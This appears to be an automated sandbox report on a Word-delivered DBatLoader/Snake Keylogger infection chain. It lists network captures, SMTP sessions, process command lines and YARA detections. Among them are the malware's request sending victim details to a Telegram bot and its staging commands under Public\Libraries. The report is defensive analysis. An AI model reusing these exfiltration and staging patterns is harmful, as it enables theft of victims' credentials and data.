                                                                                                                                          2025-01-06 06:54:42 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          28192.168.2.553788188.114.97.34438016C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-06 06:54:43 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-06 06:54:43 UTC853INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:43 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461272
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ncEgBZHixXWCIlPY9ILupq35uFU4agmlhLDFTYbv6YiagDpzMQgNu%2Fngv3ycw%2FIr6N7nQqs10PC6AqN5TA7g6oVxjc2AQAoWpE4lB4KjGHzmvTYJ07G1uhD3L9TnmCCMzOvlIm1d"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cc613f12ef9d-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1946&min_rtt=1942&rtt_var=737&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1476985&cwnd=134&unsent_bytes=0&cid=71241cbe5681076e&ts=157&x=0"
                                                                                                                                          2025-01-06 06:54:43 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          29192.168.2.553795149.154.167.2204438016C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-06 06:54:44 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2006/01/2025%20/%2014:38:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                          Host: api.telegram.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2025-01-06 06:54:44 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:44 GMT
                                                                                                                                          Content-Type: application/json
                                                                                                                                          Content-Length: 55
                                                                                                                                          Connection: close
                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                          2025-01-06 06:54:44 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                          Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                          SMTP Packets

                                                                                                                                          TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                                          Jan 6, 2025 07:54:33.341274977 CET58753704208.91.198.176192.168.2.5220 PLESK-WEB15.webhostbox.net ESMTP MailEnable Service, Version: 10.43-10.43- ready at 01/06/25 06:54:33
                                                                                                                                          Jan 6, 2025 07:54:33.341594934 CET53704587192.168.2.5208.91.198.176EHLO 675052
                                                                                                                                          Jan 6, 2025 07:54:33.491071939 CET58753704208.91.198.176192.168.2.5250-PLESK-WEB15.webhostbox.net [8.46.123.189], this server offers 5 extensions
                                                                                                                                          250-AUTH NTLM CRAM-MD5 LOGIN
                                                                                                                                          250-SIZE 31457280
                                                                                                                                          250-HELP
                                                                                                                                          250-AUTH=LOGIN
                                                                                                                                          250 STARTTLS
                                                                                                                                          Jan 6, 2025 07:54:33.491281033 CET53704587192.168.2.5208.91.198.176STARTTLS
                                                                                                                                          Jan 6, 2025 07:54:33.648866892 CET58753704208.91.198.176192.168.2.5220 Ready to start TLS
                                                                                                                                          Jan 6, 2025 07:54:43.715552092 CET58753793208.91.198.176192.168.2.5220 PLESK-WEB15.webhostbox.net ESMTP MailEnable Service, Version: 10.43-10.43- ready at 01/06/25 06:54:43
                                                                                                                                          Jan 6, 2025 07:54:43.715877056 CET53793587192.168.2.5208.91.198.176EHLO 675052
                                                                                                                                          Jan 6, 2025 07:54:43.863943100 CET58753793208.91.198.176192.168.2.5250-PLESK-WEB15.webhostbox.net [8.46.123.189], this server offers 5 extensions
                                                                                                                                          250-AUTH NTLM CRAM-MD5 LOGIN
                                                                                                                                          250-SIZE 31457280
                                                                                                                                          250-HELP
                                                                                                                                          250-AUTH=LOGIN
                                                                                                                                          250 STARTTLS
                                                                                                                                          Jan 6, 2025 07:54:43.864168882 CET53793587192.168.2.5208.91.198.176STARTTLS
                                                                                                                                          Jan 6, 2025 07:54:44.022413015 CET58753793208.91.198.176192.168.2.5220 Ready to start TLS
                                                                                                                                          Jan 6, 2025 07:54:50.854343891 CET58753841208.91.198.176192.168.2.5220 PLESK-WEB15.webhostbox.net ESMTP MailEnable Service, Version: 10.43-10.43- ready at 01/06/25 06:54:50
                                                                                                                                          Jan 6, 2025 07:54:50.854557991 CET53841587192.168.2.5208.91.198.176EHLO 675052
                                                                                                                                          Jan 6, 2025 07:54:51.000725985 CET58753841208.91.198.176192.168.2.5250-PLESK-WEB15.webhostbox.net [8.46.123.189], this server offers 5 extensions
                                                                                                                                          250-AUTH NTLM CRAM-MD5 LOGIN
                                                                                                                                          250-SIZE 31457280
                                                                                                                                          250-HELP
                                                                                                                                          250-AUTH=LOGIN
                                                                                                                                          250 STARTTLS
                                                                                                                                          Jan 6, 2025 07:54:51.000953913 CET53841587192.168.2.5208.91.198.176STARTTLS
                                                                                                                                          Jan 6, 2025 07:54:51.155625105 CET58753841208.91.198.176192.168.2.5220 Ready to start TLS

                                                                                                                                          Statistics

                                                                                                                                          CPU Usage

                                                                                                                                          Click to jump to process

                                                                                                                                          Memory Usage

                                                                                                                                          Click to jump to process

                                                                                                                                          High Level Behavior Distribution

                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                          Behavior

                                                                                                                                          Click to jump to process

                                                                                                                                          System Behavior

                                                                                                                                          General

                                                                                                                                          Target ID:0
                                                                                                                                          Start time:01:53:55
                                                                                                                                          Start date:06/01/2025
                                                                                                                                          Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                          Imagebase:0x420000
                                                                                                                                          File size:1'620'872 bytes
                                                                                                                                          MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:7
                                                                                                                                          Start time:01:54:02
                                                                                                                                          Start date:06/01/2025
                                                                                                                                          Path:C:\Windows\SysWOW64\brightness.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:C:\Windows\SysWOW64\brightness.exe
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:1'161'216 bytes
                                                                                                                                          MD5 hash:6047499517804F1EA76B508CA469DE99
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000002.2166181878.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000002.2130519568.00000000020F6000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Antivirus matches:
                                                                                                                                          • Detection: 26%, ReversingLabs
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:8
                                                                                                                                          Start time:01:54:06
                                                                                                                                          Start date:06/01/2025
                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                                                          Imagebase:0x790000
                                                                                                                                          File size:236'544 bytes
                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:9
                                                                                                                                          Start time:01:54:06
                                                                                                                                          Start date:06/01/2025
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:10
                                                                                                                                          Start time:01:54:06
                                                                                                                                          Start date:06/01/2025
                                                                                                                                          Path:C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:175'800 bytes
                                                                                                                                          MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3761815034.00000000221C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.3761815034.00000000221C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000A.00000002.3731530309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000002.3731530309.0000000000C20000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000001.2128731771.0000000000C20000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000A.00000001.2128731771.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                          • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                          • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.3759975786.0000000021121000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Antivirus matches:
                                                                                                                                          • Detection: 3%, ReversingLabs
                                                                                                                                          Reputation:moderate
                                                                                                                                          Has exited:false

                                                                                                                                          General

                                                                                                                                          Target ID:12
                                                                                                                                          Start time:01:54:17
                                                                                                                                          Start date:06/01/2025
                                                                                                                                          Path:C:\Users\Public\Libraries\Aiymwhpj.PIF
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\Public\Libraries\Aiymwhpj.PIF"
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:1'161'216 bytes
                                                                                                                                          MD5 hash:6047499517804F1EA76B508CA469DE99
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                          Antivirus matches:
                                                                                                                                          • Detection: 26%, ReversingLabs
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:13
                                                                                                                                          Start time:01:54:18
                                                                                                                                          Start date:06/01/2025
                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                                                          Imagebase:0x790000
                                                                                                                                          File size:236'544 bytes
                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:14
                                                                                                                                          Start time:01:54:18
                                                                                                                                          Start date:06/01/2025
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          General

                                                                                                                                          Target ID:15
                                                                                                                                          Start time:01:54:18
                                                                                                                                          Start date:06/01/2025
                                                                                                                                          Path:C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:C:\Users\Public\Libraries\jphwmyiA.pif
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:175'800 bytes
                                                                                                                                          MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000F.00000001.2248691179.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                          • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000F.00000002.3731678723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000F.00000002.3758305974.000000001C1D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000F.00000002.3731678723.0000000000B90000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000F.00000001.2248691179.0000000000B90000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.3760427867.000000001D271000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000002.3760427867.000000001D271000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
